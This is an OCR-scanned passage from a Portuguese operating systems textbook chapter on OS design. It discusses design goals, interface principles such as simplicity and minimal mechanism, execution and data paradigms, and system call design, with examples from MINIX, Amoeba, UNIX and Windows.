(LAMPSON, 1984), “On Building Systems that Will 
Fail” (CORBATÓ, 1991) e “End-to-end Arguments in 
System Design” (SALTZER et al., 1984). Como o livro 
de Brooks, esses três artigos têm sobrevivido extrema- 
mente bem aos anos; muitos de seus pensamentos são 
válidos ainda hoje como quando foram publicados pela 
primeira vez. 

Este capítulo esboça essas ideias, somadas a uma 
experiência pessoal como projetista ou coprojetista de 
dois sistemas operacionais: Amoeba (TANENBAUM et 
al., 1990) e MINIX (TANENBAUM e WOODHULL, 
2006). Visto que não há nenhum consenso entre os pro- 
jetistas de sistemas operacionais sobre a melhor maneira 





de projetar um sistema operacional, este capítulo será, 
assim, mais pessoal, especulativo e indubitavelmente 
mais controverso que os anteriores. 


12.1 A natureza do problema de projeto 


O projeto de um sistema operacional é mais um pro- 
jeto de engenharia do que uma ciência exata. É muito 
mais difícil estabelecer objetivos claros e alcançá-los. 
Vamos abordar inicialmente esses pontos. 


12.1.1 Objetivos 


Para projetar um sistema operacional bem-sucedi- 
do, os projetistas precisam ter uma ideia clara do que 
querem. A falta de um objetivo torna muito mais difícil 
tomar decisões mais adiante. Para deixar essa questão 
mais clara, vamos partir de duas linguagens de progra- 
mação: PL/I e C. PL/I foi projetada pela IBM na déca- 
da de 1960 porque era uma chateação fornecer suporte 
tanto para FORTRAN quanto para COBOL e constran- 
gedor ouvir os acadêmicos dizerem, nos bastidores, 
que Algol era melhor que os dois. Assim, um comitê 
foi criado para produzir uma linguagem que deveria sa- 
tisfazer a todos em tudo: a PL/I. Ela tinha um pouqui- 
nho de FORTRAN, de COBOL e de Algol. Fracassou 
porque não tinha uma visão unificada: era apenas uma 
coleção de características em situação de disputa umas 
com as outras e, para começar, muito desajeitada para 
que fosse compilada eficientemente. 

Agora considere a linguagem C. Ela foi projetada 
por uma pessoa (Dennis Ritchie) com um propósito 
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(programação de sistemas). Foi um grande sucesso, 
pois Ritchie sabia o que queria e o que não queria. Por 
conseguinte, ela ainda é amplamente usada, mesmo três 
décadas após sua aparição. É fundamental ter uma clara 
visão do que você realmente quer. 

Mas o que os projetistas de sistemas operacionais re- 
almente querem? Obviamente, isso varia de um sistema 
para outro, sendo diferente para sistemas embarcados e 
para sistemas servidores. Contudo, para sistemas ope- 
racionais de propósito geral, quatro itens principais de- 
vem ser considerados: 


1. Definir abstrações. 

2. Fornecer operações primitivas. 
3. Garantir isolamento. 

4. Gerenciar o hardware. 


Cada um desses itens será discutido a seguir. 

A tarefa mais importante — talvez a mais dificil — 
de um sistema operacional é definir as abstrações cor- 
retamente. Algumas delas, como processos, espaços de 
endereçamento e arquivos, têm sido usadas durante tanto 
tempo que parecem óbvias. Outras, como threads, são 
mais recentes e menos desenvolvidas. Por exemplo, se 
um processo multithreaded que possui um thread bloque- 
ado esperando entrada do teclado realiza um fork, existe 
um thread no novo processo também esperando uma en- 
trada do teclado? Outras abstrações são relacionadas a 
sincronização, sinais, modelo de memória, modelagem 
de E/S e muitas outras áreas. 

Cada uma das abstrações pode ser instanciada na 
forma de estruturas de dados concretas. Os usuários po- 
dem criar processos, arquivos, pipes etc. As operações 
primitivas manipulam essas estruturas de dados. Por 
exemplo, os usuários podem ler e escrever em arquivos. 
As operações primitivas são implementadas na forma 
de chamadas de sistema. Do ponto de vista do usuário, 
o coração do sistema operacional é formado por abs- 
trações e operações sobre elas, disponíveis por meio de 
chamadas de sistema. 

Visto que, em alguns computadores, múltiplos usu- 
ários podem estar conectados a um computador ao 
mesmo tempo, o sistema operacional precisa fornecer 
mecanismos para mantê-los separados. Um usuário não 
pode interferir em outro. O conceito de processo é am- 
plamente aplicado para agrupar recursos por questões 
de proteção. Arquivos e outras estruturas de dados em 
geral são protegidos também. Outro local onde a sepa- 
ração é decisiva é na virtualização: o hipervisor precisa 
garantir que as máquinas virtuais não toquem uma na 
outra. A garantia de que cada usuário possa executar so- 
mente operações autorizadas sobre dados autorizados é 
um objetivo essencial do projeto de sistemas. Contudo, 


os usuários também querem compartilhar dados e recur- 
sos, portanto o isolamento deve ser seletivo e sob o con- 
trole do usuário. Isso é muito mais difícil. O programa 
de e-mail não deveria conseguir impactar severamente 
o navegador web. Mesmo quando há um único usuário, 
diferentes processos precisam ser isolados um do outro. 
Alguns sistemas, como Android, iniciarão cada proces- 
so pertencente ao mesmo usuário com um ID de usuário 
diferente, para proteger os processos um do outro. 

Fortemente relacionada com essa questão está a 
necessidade de isolar falhas. Se alguma parte do sis- 
tema falha — muito provavelmente um processo do 
usuário —, ela não deve ser capaz de arrastar o resto do 
sistema junto. O projeto do sistema tem de garantir que 
as várias partes também sejam bem isoladas umas das 
outras. Idealmente, partes do sistema operacional tam- 
bém devem ser isoladas umas das outras para permitir 
falhas independentes. Indo um pouco além disso, será 
que o sistema operacional deveria ser tolerante a falhas 
e “autocurável”? 

Por fim, o sistema operacional tem de gerenciar o 
hardware. Em particular, ele deve cuidar de todos os 
circuitos eletrônicos de baixo nível, como controlado- 
res de interrupção e de barramento. Ele também precisa 
fornecer uma estrutura que permita que os drivers de 
dispositivos gerenciem dispositivos de entrada e saída 
maiores, como discos, impressoras e monitores. 


12.1.2 Por que é difícil projetar um sistema 
operacional? 


A lei de Moore diz que o hardware de um compu- 
tador é melhorado por um fator de 100 a cada década. 
Mas não existe nenhuma lei que diga que o sistema ope- 
racional é melhorado por um fator de 100 a cada déca- 
da, ou mesmo que tenha alguma melhora. Na realidade, 
pode acontecer que alguns deles sejam piores em certas 
questões centrais (como a confiabilidade) do que a ver- 
são 7 do UNIX era na década de 1970. 

Por quê? A inércia e o desejo de compatibilidade 
com sistemas mais antigos muitas vezes levam a maior 
parte da culpa, e a falha em aderir aos bons princípios 
de projeto é também uma razão. Entretanto, há mais a 
ser dito. De certa maneira, os sistemas operacionais são 
fundamentalmente diferentes dos pequenos aplicativos 
que podem ser baixados a um custo de US$ 49. Vamos 
observar oito das questões que tornam o projeto do sis- 
tema operacional muito mais difícil do que o projeto de 
um aplicativo. 

Primeira: os sistemas operacionais têm se torna- 
do programas extensos demais. Nenhuma pessoa pode 


sentar-se diante de um PC e escrever um sistema ope- 
racional sério às pressas, em poucos meses; nem mes- 
mo em poucos anos. Todas as versões atuais do UNIX 
contêm milhões de linhas de código; o Linux atingiu 
15 milhões, por exemplo. O Windows 8 provavelmente 
está na faixa de 50 a 100 milhões de linhas de código, 
dependendo do que for contado (o Vista tinha 70 mi- 
lhões, mas as mudanças desde então acrescentaram e 
removeram código). Ninguém é capaz de compreender 
um milhão de linhas de código, quanto mais 50 ou 100 
milhões. Quando você tem um produto que nenhum dos 
projetistas pode compreender completamente, não deve 
surpreender o fato de os resultados estarem muitas vezes 
distantes da solução ideal. 

Os sistemas operacionais não são os sistemas mais 
complexos que existem. As aeronaves de transporte de 
passageiros, por exemplo, são muito mais complica- 
das, mas se dividem melhor em subsistemas isolados. 
As pessoas que projetam os banheiros dessas aeronaves 
não se preocupam com o sistema de radares. Os dois 
subsistemas não interagem muito entre si. Não existem 
casos conhecidos em que um vaso entupido em um por- 
ta-aviões tenha iniciado o disparo de mísseis. Em um 
sistema operacional, o sistema de arquivos muitas vezes 
interage com o sistema de memória em situações ines- 
peradas e imprevisíveis. 

Segunda: os sistemas operacionais têm de lidar com a 
concorrência. Existem múltiplos usuários e dispositivos 
de entrada e saída, todos ativos de uma só vez. O ge- 
renciamento da concorrência é inerentemente muito mais 
difícil do que o gerenciamento de uma única atividade se- 
quencial. As condições de corrida e impasses são apenas 
dois dos problemas que surgem. 

Terceira: os sistemas operacionais lidam com usu- 
ários potencialmente hostis — usuários que querem 
interferir no funcionamento do sistema ou fazer coisas 
proibidas, como roubar os arquivos dos outros. O siste- 
ma operacional precisa tomar medidas para evitar que 
esses usuários se comportem inadequadamente. Os pro- 
gramas de processamento de textos e editores de ima- 
gens não têm esse problema. 

Quarta: desconsiderando o fato de que nem todos 
os usuários confiam uns nos outros, muitos usuários 
querem compartilhar informações e recursos com ou- 
tros usuários selecionados. O sistema operacional tem 
de tornar isso possível, mas de modo que os usuários 
mal-intencionados não possam interferir. Novamente, 
os aplicativos não encaram esse tipo de desafio. 

Quinta: os sistemas operacionais vivem por um 
longo tempo. O UNIX vem sendo usado há cerca de 
40 anos; o Windows existe há cerca de 30 anos e não 
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mostra sinais de que vá desaparecer. Em consequência, 
os projetistas devem pensar em como o hardware e as 
aplicações poderão mudar no futuro distante e como 
eles devem se preparar para isso. Os sistemas direcio- 
nados muito intensamente para uma visão especifica do 
mundo em geral logo ficam para trás. 

Sexta: os projetistas de sistemas operacionais real- 
mente não têm uma boa ideia de como seus sistemas 
serão usados, então eles precisam desenvolvê-los visan- 
do a uma considerável generalidade. Nem o UNIX nem 
o Windows foram projetados com navegadores web ou 
vídeo streaming de alta definição em mente — apesar 
de muitos computadores que executam esses sistemas 
fazerem pouco mais do que isso. Ninguém diz a um pro- 
jetista de navio para construir um sem especificar se o 
que se quer é um navio pesqueiro, de cruzeiro ou de 
guerra. Menos ainda se muda de ideia depois do produto 
pronto. 

Sétima: os sistemas operacionais modernos em geral 
são projetados para serem portáteis, o que significa que 
têm de executar em múltiplas plataformas de hardware. 
Eles também devem funcionar com centenas, talvez mi- 
lhares, de dispositivos de E/S, e todos são projetados 
independentemente, sem qualquer relação uns com os 
outros. Um exemplo de um problema gerado por essa 
diversificação é a necessidade que um sistema opera- 
cional tem de executar tanto em máquinas que adotam 
a ordem de bytes little-endian quanto big-endian. Um 
segundo exemplo era visto constantemente no MS-DOS 
quando os usuários tentavam instalar, por exemplo, uma 
placa de som e um modem que usavam as mesmas por- 
tas de entrada e de saída ou linhas de requisição de in- 
terrupção. Alguns poucos programas além dos sistemas 
operacionais precisam tratar esses problemas causados 
pelas partes conflitantes do hardware. 

Oitava, última em nossa lista: a frequente necessi- 
dade de manter a compatibilidade com algum sistema 
operacional anterior. Esse sistema pode ter restrições 
nos tamanhos das palavras, em nomes de arquivos ou 
em outros aspectos que os projetistas hoje consideram 
obsoletos, mas que estão atrelados a esses sistemas an- 
tigos. É o mesmo que transformar uma fábrica a fim de 
produzir os carros do próximo ano em vez dos carros 
deste ano, mas continuando a produzir os carros deste 
ano com toda a capacidade. 


12.2 Projeto de interface 


Deve estar claro neste momento que a escrita de 
um sistema operacional moderno não é fácil. Mas, por 
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onde começar? Provavelmente, o melhor é pensar nas 
interfaces que ele deve fornecer. Um sistema operacio- 
nal fornece um conjunto de abstrações, implementadas 
principalmente por tipos de dados (por exemplo, arqui- 
vos) e operações sobre eles (por exemplo, read). Juntos, 
esses aspectos formam a interface para seus usuários. 
Note que, nesse contexto, os usuários do sistema ope- 
racional são programadores que escrevem códigos que 
usam chamadas de sistema, não pessoas que executam 
programas aplicativos. 

Além da interface principal de chamadas de sistema, 
a maioria dos sistemas operacionais tem interfaces adi- 
cionais. Por exemplo, alguns programadores precisam 
escrever drivers de dispositivos para inseri-los dentro 
do sistema operacional. Esses drivers enxergam certas 
características e podem realizar determinadas chamadas 
de procedimento. Essas características e chamadas tam- 
bém definem uma interface, mas esta é muito diferente 
daquela que os programadores de aplicativos enxergam. 
Todas essas interfaces devem ser cuidadosamente pro- 
jetadas se o objetivo é um sistema bem-sucedido. 


12.2.1 Princípios norteadores 


Existem princípios capazes de orientar no projeto de 
interface? Acreditamos que sim. Em linhas gerais, são 
eles: simplicidade, completude e capacidade para ser im- 
plementado eficientemente. 


Princípio 1: simplicidade 


Uma interface simples é mais fácil de compreender 
e implementar de uma maneira livre de defeitos de soft- 
ware. Todos os projetistas de sistemas deveriam memo- 
rizar esta famosa citação do pioneiro aviador francês e 
escritor Antoine de St. Exupéry: 


A perfeição é alcançada não quando não há mais o que 
acrescentar, mas sim quando não há mais o que tirar. 


Se você quiser ser realmente meticuloso, ele não dis- 
se isso. Ele disse: 


Il semble que la perfection soit atteinte non quand 
il n’y a plus rien a ajouter, mais quand il n’y a plus 
rien a retrancher. 


Mas vocé entendeu a ideia. Decore-a de alguma forma. 

Esse principio diz que menos é melhor do que 
mais, ao menos para o sistema operacional. Uma ou- 
tra maneira de dizer isso é o princípio KISS: “Mante- 
nha-o simples, estúpido” (do inglês “Keep It Simple, 
Stupid”). 


Princípio 2: completude 


Claro, a interface deve permitir a realização de qual- 
quer coisa que os usuários queiram fazer, isto é, ela deve 
ser completa. Isso nos leva a uma outra citação famosa, 
agora de Albert Einstein: 


Tudo deve ser o mais simples possível, mas não mais 
simples que isso. 


Em outras palavras, o sistema operacional deve fazer 
exatamente o que é necessário que ele faça e mais nada. 
Se os usuários precisam armazenar dados, ele deve for- 
necer algum mecanismo para armazenar dados. Se os 
usuários precisam comunicar-se uns com os outros, O 
sistema operacional tem de fornecer um mecanismo de 
comunicação, e assim por diante. Em sua palestra de 
1991 durante o Turing Award, Fernando Corbató, um 
dos projetistas do CTSS e do MULTICS, combinou os 
conceitos de simplicidade e completude e disse: 


Primeiro, é importante enfatizar o valor da simplici- 
dade e da elegância, já que a complexidade tem uma 
maneira de agravar as dificuldades e, como temos 
visto, criando erros. Minha definição de elegância 
é a realização de uma dada funcionalidade com o 
mínimo de mecanismo e o máximo de clareza. 


A ideia principal aqui é o mínimo de mecanismo. Em 
outras palavras, cada característica, função ou chamada 
de sistema deve arcar com seu próprio peso. Elas devem 
fazer algo e fazê-lo bem. Quando um membro do time 
de projeto propõe estender uma chamada de sistema ou 
adicionar algum novo recurso, os outros devem pergun- 
tar se algo terrível ocorrerá se ignorarmos essa questão. 
Se a resposta for: “Não, mas algum dia alguém poderá 
descobrir que esse recurso é útil”, coloque-a em uma 
biblioteca no nível do usuário, não no nível do sistema 
operacional, ainda que ela fique mais lenta dessa forma. 
Nem todos os recursos precisam ser mais rápidos do 
que uma bala em alta velocidade. O objetivo é preservar 
aquilo que Corbató chamou de mínimo de mecanismo. 

Vamos agora considerar resumidamente dois exem- 
plos de minha própria experiência: o MINIX (TA- 
NENBAUM e WOODHULL, 2006) e o Amoeba 
(TANENBAUM et al., 1990). Para todas as intenções 
e propósitos, o MINIX até pouco tempo tinha três cha- 
madas de sistema: send, receive e sendrec. O sistema 
é estruturado como uma coleção de processos, com o 
gerenciador de memória, o sistema de arquivos e cada 
driver de dispositivo sendo um processo escalonado 
separadamente. Em uma análise preliminar, tudo o que 
o núcleo faz é escalonar processos e tratar a troca de 


mensagens entre eles. Em consequência, somente duas 
chamadas de sistema são necessárias: send, para enviar 
uma mensagem, e receive, para receber uma mensagem. 
A terceira chamada, sendrec, é apenas uma otimização, 
por questões de eficiência, para permitir que uma men- 
sagem seja enviada e a resposta seja requisitada usando 
somente uma interrupção do núcleo. Tudo o mais é fei- 
to requisitando algum outro processo (por exemplo, o 
processo do sistema de arquivos ou o driver do disco) 
para fazer o trabalho. A versão mais recente do MINIX 
acrescentou mais duas chamadas, ambas para a comuni- 
cação assíncrona. A chamada senda envia uma mensa- 
gem assíncrona. O núcleo tentará entregar a mensagem, 
mas a aplicação não espera por isso; ela simplesmente 
continua funcionando. De modo semelhante, o sistema 
usa a chamada notify para remeter notificações curtas. 
Por exemplo, o núcleo pode notificar um driver de dis- 
positivo no espaço do usuário de que algo aconteceu 
— semelhante a uma interrupção. Não existe mensagem 
associada a uma notificação. Quando o núcleo entrega 
uma notificação ao processo, tudo o que ele faz é inver- 
ter um bit em um mapa de bits por processo, indican- 
do que algo aconteceu. Por ser tão simples, isso pode 
ser rápido e o núcleo não precisa se preocupar com a 
mensagem que deve ser entregue se o processo receber 
a mesma notificação duas vezes. Vale a pena observar 
que, embora o número de chamadas ainda seja muito 
pequeno, ele está crescendo. O inchaço é inevitável. A 
resistência é inútil. 

Estas são apenas as chamadas do núcleo, natural- 
mente. A execução de um sistema compatível com PO- 
SIX em cima dele requer a implementação de muitas 
chamadas do sistema POSIX. Porém, a beleza disso é 
que todas elas estão relacionadas a apenas um pequeno 
conjunto de chamadas do núcleo. Com um sistema que 
(ainda) é tão simples, há uma chance de que poderemos 
acertá-lo. 

O Amoeba é ainda mais simples; tem somente uma 
chamada de sistema: executar chamada de procedimen- 
to remota. Essa chamada envia uma mensagem e espera 
por uma resposta. É na essência o mesmo que o sendrec 
do MINIX. Todo o resto é construído sobre essa única 
chamada. Se a comunicação síncrona é o caminho a se- 
guir ou não, isso é outra questão, à qual retornaremos 
na Seção 12.3. 


Princípio 3: eficiência 


O terceiro princípio é a eficiência da implemen- 
tação. Se uma característica ou uma chamada de sis- 
tema não puder ser implementada de modo eficiente, 
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provavelmente não vale a pena tê-la. Também deve ser 
intuitivo para o programador o quanto custa uma cha- 
mada de sistema. Por exemplo, os programadores do 
UNIX esperam que a chamada de sistema Iseek seja 
mais barata do que a chamada de sistema read, pois a 
primeira apenas troca um ponteiro na memória, ao pas- 
so que a segunda executa E/S em disco. Se os custos 
intuitivos estiverem errados, os programadores escreve- 
rão programas ineficientes. 


12.2.2 Paradigmas 


Uma vez que os objetivos foram estabelecidos, o 
projeto pode começar. Um bom ponto de partida é pen- 
sar sobre como os clientes enxergarão o sistema. Uma 
das questões mais importantes é como fazer todas as 
características do sistema bem unificadas para formar 
aquilo que é muitas vezes chamado de coerência ar- 
quitetural. Nesse sentido, é importante diferenciar dois 
tipos de “clientes” do sistema operacional. De um lado, 
existem os usuários, que interagem com os programas 
aplicativos; do outro lado estão os programadores, que 
escrevem esses programas. Os primeiros, na maioria 
das vezes, interagem com a interface gráfica (GUI); os 
outros, em geral, interagem com a interface de chama- 
da de sistema. Se a intenção é ter uma única interface 
gráfica abrangendo o sistema todo, como no Macintosh, 
o projeto deveria se iniciar por ela. Se, por outro lado, 
a intenção é dar suporte a muitas interfaces gráficas, 
como no UNIX, a interface de chamada de sistema de- 
veria ser projetada primeiro. Fazer primeiro a interface 
gráfica implica um projeto de cima para baixo (ou top- 
-down). As questões importantes são: quais caracteris- 
ticas ela terá, como os usuários vão interagir com ela e 
como o sistema deveria ser projetado para dar suporte 
a ela. Por exemplo, se a maioria dos programas mostra 
ícones na tela e depois espera até que o usuário clique 
sobre eles, isso sugere um modelo orientado a eventos 
para a interface gráfica e provavelmente também para 
o sistema operacional. Por outro lado, se a tela é, na 
maioria das vezes, cheia de janelas de texto, então um 
modelo no qual os processos leem do teclado provavel- 
mente é melhor. 

Fazer primeiro a interface de chamada de sistema im- 
plica um projeto de baixo para cima (ou bottom-up). Nesse 
caso, a questão é: de quais tipos de características os pro- 
gramadores em geral precisam? Na verdade, não são ne- 
cessárias muitas características especiais para dar suporte a 
uma interface gráfica. Por exemplo, o sistema gerenciador 
de janelas do UNIX, X, nada mais é que um grande pro- 
grama em C que faz chamadas reads e writes no teclado, 
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no mouse e no vídeo. O X foi desenvolvido bem depois do 
UNIX e não exigiu muitas alterações do sistema operacio- 
nal para fazê-lo funcionar. Essa experiência validou o fato 
de que o UNIX era suficientemente completo. 


Paradigmas da interface do usuário 


Para ambas as interfaces, em nível de interface grá- 
fica e em nível de chamada de sistema, o aspecto mais 
importante é a existência de um bom paradigma (às ve- 
zes chamado de metáfora) para fornecer uma maneira 
de enxergar a interface. Muitas interfaces gráficas para 
computadores pessoais usam o paradigma WIMP, dis- 
cutido no Capítulo 5. Esse paradigma usa o “aponte e 
clique”, “aponte e clique duas vezes”, “arraste” e ou- 
tros idiomas por toda a interface para fornecer uma co- 
erência arquitetural ao conjunto. Muitas vezes existem 
requisitos adicionais para os programas, como a exis- 
tência de uma barra de menu com ARQUIVO, EDITAR 
e outros itens, cada um deles com certos itens de menu 
bem conhecidos. Dessa maneira, os usuários que conhe- 
cem um programa podem rapidamente aprender outro. 

Contudo, a interface de usuário WIMP não é a única 
possível. Tablets, smartphones e alguns notebooks usam 
telas sensíveis ao toque, para permitir que os usuários 
interajam mais direta e intuitivamente com o dispositi- 
vo. Alguns palmtops utilizam uma interface estilizada 
para a escrita manual. Os dispositivos de multimídia de- 
dicados podem usar uma interface do tipo videocassete. 
E, claro, a entrada de voz tem um paradigma completa- 
mente diferente. O importante não é tanto o paradigma 
escolhido, mas o fato de existir um único paradigma do- 
minante que unifique toda a interface do usuário. 

Qualquer que seja o paradigma escolhido, é im- 
portante que todos os aplicativos o utilizem. Em 


(lell: TEFAF (a) Código algoritmico. (b) Código orientado a eventos. 


main() 


{ 


int... ; 


init(); 
do_something(); 
read(...); 

do something else(); 
write(...); 
keep_going(); 

exit(0); 


(a) 


consequéncia, os projetistas de sistemas precisam for- 
necer bibliotecas e kits de ferramentas para os desen- 
volvedores de aplicações que lhes permitam acessar 
procedimentos que produzam uma interface com estilo 
uniforme. Sem ferramentas, todos os desenvolvedores 
de aplicação farão algo diferente um do outro. O projeto 
da interface do usuário é muito importante, mas não é 
o assunto deste livro, portanto voltaremos ao tema da 
interface do sistema operacional. 


Paradigmas de execução 


A coerência arquitetural é importante no nível do 
usuário, mas de igual importância no nível da interface 
de chamadas de sistema. Nesse caso, é frequentemente 
útil diferenciar entre o paradigma de execução e o pa- 
radigma de dados, de modo que descreveremos ambos, 
iniciando com o primeiro. 

Dois paradigmas de execução são amplamente co- 
nhecidos: o algorítmico e o orientado a eventos. O 
paradigma algorítmico baseia-se na ideia de que um 
programa é inicializado para executar alguma função 
que ele conhece de antemão ou que deve obter a partir 
de seus parâmetros. Essa função poderia ser compilar 
um programa, rodar uma folha de pagamento ou pilotar 
um avião automaticamente para determinado destino. A 
lógica básica é fixada em código, no qual o programa 
faz chamadas de sistema de tempos em tempos para 
obter a entrada do usuário, os serviços do sistema ope- 
racional e assim por diante. Essa estratégia está esque- 
matizada na Figura 12.1(a). 

O outro paradigma de execução é o paradig- 
ma orientado a eventos, exemplificado pela Figura 
12.1(b). Nesse caso, o programa executa algum tipo de 
inicialização — por exemplo, mostra uma certa tela — e 


main() 


{ 


mess_t msg; 


init(); 
while (get message(&msg)) { 
switch (msg.type) { 
case 1:...; 
case 2:...; 
case 3:...; 


depois espera que o sistema operacional o informe sobre 
o primeiro evento. O evento muitas vezes é uma tecla 
pressionada ou um movimento do mouse. Esse projeto 
é útil para programas altamente interativos. 

Cada uma dessas maneiras de projetar o sistema 
conduz a um estilo próprio de programação. No para- 
digma algorítmico, os algoritmos são fundamentais e 
o sistema operacional é considerado um provedor de 
serviços. No paradigma orientado a eventos, o sistema 
operacional também fornece serviços, mas essa função 
é ofuscada por sua função de coordenador de ativida- 
des do usuário e de gerador de eventos que são consu- 
midos pelos processos. 


Paradigmas de dados 


O paradigma de execução não é o único exportado 
pelo sistema operacional. Um outro igualmente impor- 
tante é o paradigma de dados. A questão principal nesse 
caso é como as estruturas do sistema e os dispositivos 
são apresentados ao programador. Nas primeiras ver- 
sões dos sistemas FORTRAN em lote, tudo era modela- 
do como uma fita magnética sequencial. Os pacotes de 
cartões de entrada eram tratados como fitas de entrada, 
os pacotes de cartões a serem perfurados eram tratados 
como fitas de saída e a saída para a impressora era tra- 
tada como fita de saída. Os arquivos do disco também 
eram tratados como fitas. O acesso aleatório ao arquivo 
somente era possível retrocedendo a fita até a posição 
correspondente do arquivo e lendo-o novamente. 

O mapeamento era feito usando cartões de controle 
de tarefas, como nestes exemplos: 


MOUNT(TAPEOS, REEL781) 
RUN(INPUT, MYDATA, OUTPUT, PUNCH, TAPE08) 


O primeiro cartão instrui o operador a pegar o rolo 
de fita 781 da prateleira de fitas e montá-lo no dispositi- 
vo de fita número 8. O segundo cartão instrui o sistema 
operacional a executar o programa FORTRAN recém- 
-compilado, mapeando INPUT (que indica a leitora 
de cartões) à fita lógica número 1, o arquivo do disco 
MYDATA à fita lógica número 2, a impressora (chamada 
OUTPUT) à fita lógica número 3, a perfuradora de car- 
tões (chamada PUNCH) à fita lógica número 4 e o dis- 
positivo de fita físico número 8 à fita lógica número 5. 

O FORTRAN tinha uma sintaxe para leitura e es- 
crita em fitas lógicas. Lendo da fita lógica número 1, o 
programa obtinha a entrada via cartão. Escrevendo na 
fita lógica número 3, a saída aparecia posteriormente na 
impressora. Lendo da fita lógica número 5, o rolo de fita 
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781 podia ser lido e assim por diante. Note que a ideia 
de fita era apenas um paradigma para integrar a leitora 
de cartões, a impressora, a perfuradora, os arquivos de 
disco e as fitas. Nesse exemplo, somente a fita lógica 
número 5 era uma fita física; o resto eram arquivos co- 
muns do disco (em spool). Tratava-se de um paradigma 
primitivo, mas foi um início na direção correta. 

Mais tarde chegou o UNIX, que vai muito mais além 
com o uso do modelo “tudo é um arquivo”. Usando esse 
paradigma, todos os dispositivos de entrada e saída são 
tratados como arquivos e podem ser abertos e manipula- 
dos como arquivos comuns. As declarações em C 


fd1 = open(“file1”, O_RDWR); 
fd2 = open(“/dev/tty”, O_RDWR)” 


abrem um arquivo verdadeiro no disco e o terminal do 
usuário (teclado + monitor). As declarações seguintes 
podem usar fd] e fd? para ler e escrever neles, respec- 
tivamente. Daqueles comandos em diante, não existe 
diferença entre acessar o arquivo e acessar o terminal, 
exceto que posicionamentos aleatórios (seek) no termi- 
nal não são permitidos. 

O UNIX não somente unifica os arquivos e os dis- 
positivos de entrada e saída, mas também permite que 
outros processos sejam acessados, via pipes, como ar- 
quivos. Além disso, quando são suportados arquivos 
mapeados, um processo pode obter acesso à sua própria 
memória virtual como se ela fosse um arquivo. Por fim, 
nas versões do UNIX que admitem o sistema de arqui- 
vos /proc, a declaração C 


fd3 = open(“/proc/501”, O_RDWR); 


permite ao processo (tentar) acessar a memória do pro- 
cesso 501 para leitura e escrita usando o descritor de 
arquivo fd3 — algo útil para, digamos, um depurador. 

Naturalmente, só porque alguém diz que algo é um 
arquivo não significa que isso seja verdade — para tudo. 
Por exemplo, os soquetes de rede do UNIX podem ser 
semelhantes a arquivos, mas possuem sua própria API 
de soquete, muito diferente. Outro sistema operacional, 
o Plan 9 da Bell Labs, não se comprometeu e não ofe- 
rece interfaces especializadas para soquetes de rede e 
coisas desse tipo. Como resultado, o projeto do Plan 9 é 
discutivelmente mais claro. 

O Windows tenta fazer com que tudo se pareça com 
um objeto. Uma vez que um processo tenha adquirido 
um descritor válido para um arquivo, um processo, um 
semáforo, uma caixa de correio ou outro objeto do nú- 
cleo, pode executar operações sobre ele. Esse paradig- 
ma é ainda mais geral do que o do UNIX, e muito mais 
geral do que o do FORTRAN. 
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A unificação dos paradigmas também ocorre em 
outros contextos. Um deles é importante mencionar 
aqui: a web. O paradigma por trás da web é que o ci- 
berespaço é cheio de documentos, cada um com um 
URL. Digitando um URL ou clicando em uma entra- 
da associada a um URL, você obtém o documento. Na 
realidade, muitos “documentos” não existem de fato, 
mas são gerados por um programa ou por um script de 
shell de interface quando uma solicitação é recebida. 
Por exemplo, quando um usuário solicita em uma loja 
virtual uma lista de CDs de um artista em particular, o 
documento é gerado naquele momento por um progra- 
ma — ele certamente não existia dessa forma antes que 
a solicitação fosse feita. 

Até agora vimos quatro casos, em que tudo pode ser 
fita, arquivo, objeto ou documento. Em todos os qua- 
tro, a intenção é unificar dados, dispositivos e outros 
recursos, de modo que seja fácil trabalhar com eles. 
Todo sistema operacional deve ter um paradigma de 
dados unificador. 


12.2.3 A interface de chamadas de sistema 


Se acreditamos na teoria de Corbató sobre o meca- 
nismo mínimo, então o sistema operacional deve forne- 
cer o mínimo possível de chamadas de sistema e cada 
uma deve ser a mais simples possível (mas não mais 
simples do que isso). Um paradigma de dados unifica- 
dor pode desempenhar um papel importante nesse caso. 
Por exemplo, se arquivos, processos, dispositivos de en- 
trada e saída e muito mais forem vistos como arquivos 
ou objetos, então todos eles poderão ser lidos com uma 
única chamada de sistema read. Caso contrário, pode 
ser necessário separar as chamadas em read file, read . 
proc e read tty, entre outras. 

Em alguns casos, as chamadas de sistema podem pa- 
recer precisar de diversas variantes, mas é uma prática 
muitas vezes melhor ter uma chamada que trate o caso 
geral, com diferentes rotinas de bibliotecas para escon- 
der esse fato dos programadores. Por exemplo, o UNIX 
tem uma chamada de sistema para sobrepor o espaço de 
endereçamento virtual de um processo: exec. A chama- 
da mais geral é 


exec(name, argp, envp); 


que carrega o arquivo executável name, dando a ele 
argumentos apontados por argp e as variáveis de am- 
biente apontadas por envp. Às vezes, é conveniente 
listar os argumentos explicitamente e, nesse caso, a 
biblioteca contém rotinas que são chamadas conforme 
segue: 


execl(name, argO, arg1, ..., argn, 0); 
execle(name, argo0, arg], ..., argn, envp); 


Tudo o que esses procedimentos fazem é colocar os 
argumentos em um vetor e depois chamar exec para re- 
alizar o trabalho real. Esse arranjo é o melhor de am- 
bos os mundos: uma chamada de sistema única e direta 
mantém o sistema operacional simples e ainda oferece 
ao programador a conveniência de chamar exec de vá- 
rias maneiras. 

Claro, a existência de uma chamada para tratar to- 
dos os casos possíveis pode facilmente levar à perda 
do controle. No UNIX, a criação de processos requer 
duas chamadas: fork, seguida por exec. A primeira não 
tem parâmetros; a segunda tem três. Em contrapartida, 
a chamada da Win API para a criação de processo, Crea- 
teProcess, tem dez parâmetros, um dos quais é um pon- 
teiro para uma estrutura com 18 parâmetros adicionais. 

Há muito tempo, alguém deveria ter perguntado se 
aconteceria algo terrível se deixássemos algum desses 
parâmetros de fora. A resposta sincera teria sido: “Em 
alguns casos os programadores podem ter mais trabalho 
para obter um efeito desejado, mas o resultado líquido 
teria sido um sistema operacional mais simples, menor 
e mais confiável”. Obviamente, a pessoa que propôs a 
versão de 10 + 18 parâmetros deve ter argumentado: 
“Mas os usuários gostam de todas essas características”. 
A contestação pode ter sido de que eles gostam mui- 
to mais de sistemas que usam pouca memória e nun- 
ca travam. O dilema entre mais funcionalidade à custa 
de mais memória é, no mínimo, visível — e pode ter 
um preço (visto que o preço da memória é conhecido). 
Entretanto, é difícil estimar o número de travamentos 
adicionais por ano que ocorreriam como resultado da 
inclusão de algum recurso, bem como se os usuários 
fariam a mesma escolha caso soubessem do preço es- 
condido. Esse efeito pode ser resumido na primeira lei 
de software de Tanenbaum: 


A adição de mais código adiciona mais erros. 


